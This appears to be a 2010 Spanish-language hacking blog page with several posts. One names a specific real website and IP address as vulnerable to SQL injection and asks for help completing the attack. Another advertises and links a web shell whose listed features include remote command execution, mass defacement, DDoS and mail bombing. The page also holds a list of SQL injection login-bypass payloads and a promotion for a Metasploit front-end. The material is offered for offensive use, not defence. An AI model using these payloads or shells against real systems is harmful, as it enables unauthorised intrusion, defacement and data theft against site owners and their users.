| Mobile| RSS

contactos.es.msn.com Vulnerable SQL

Vulnerable Pero No se como terminar de completar La Injection Sql
http://contactos.es.msn.com/help/contact_ex_v.php?type=1

Target:         http://contactos.es.msn.com/help/contact_ex_v.php?type=1
Host IP:        212.73.212.124
Web Server:     Zeus/4_3
DB Server:     PostgreSQL

lunes, 29 de noviembre de 2010 | Tags: | 3 comentario [ Mas... ]

shell indetectable

This shell is developed by ITSecTeam members and it can:

  • execute system commands
  • execute bypass command
  • bypass directory
  • connect to common databases like MsSQL, MsSQL, PostgreSQL, Oracle & DB2
  • edit files & directories
and new version features:
  • Adding server informaton, php version and safe mode to the top of the shell page for ease of use.
  • System drives listing.
  • Adding icons to files and folders.
  • Opening files with direct link.
  • Downloading all of the files and folders of a special folder in zip format without using a specific function.
  • Direct downloading a file.
  • Maintaining working directory to use of whole site features.
  • Adding symlink in 2 ways: using os command line and php abilities.
  • Changing string to other formats.
  • Mail Boomber.
  • Local Crashing of php and apache.
  • Dumping databse into sql and gzip format.
  • Mass defacing of all folders with write access permission.
  • Downloading a file from other servers.
  • Performing remote DDoS attack.
  • Searching for all writable folders.
  • Bypass symlink and Mod security via htaccess and disabling safe mode and disable functions via php.ini if server configured unsuitable.
  • Remonving shell automatically.
  • Copying a file without using copy function.
  • Changing of shell template.
  • Removing bugs of former versions.
  • Adding event of last activities.
  • Disabling magic qoute in runtime.
  • and so much more...

http://itsecteam.com/files/itsecteam_shell_2.1.rar

domingo, 28 de noviembre de 2010 | Tags: | 2 comentario [ Mas... ]

Injeton

asp aspx
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:   1 or '1'='1'=1
12:   1 or '1'='1' or 1=1
13:   'OR 1=1
14:   "or 1=1
15: 'xor 
16:   用户名   ' UNION Select 1,1,1 FROM admin Where ''='     (admin)
    1




PHP
'or 1=1/*



jsp
1'or'1'='1

Armitage v11.25.10


Armitage - Cyber Attack Management for Metasploit
Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don't use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Changelog:
- start msf button now kills msfrpcd session if db_connect fails
- set default database options to mysql with BackTrack 4 R2 settings.
- Armitage -> Exit menu now kills msfrpcd, if the "Start MSF" button was used
- Added ability to set up a multi/handler from Payload launch dialog

Download and more details: http://www.fastandeasyhacking.com

Video demo: Armitage - Fast and Easy Hacking

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter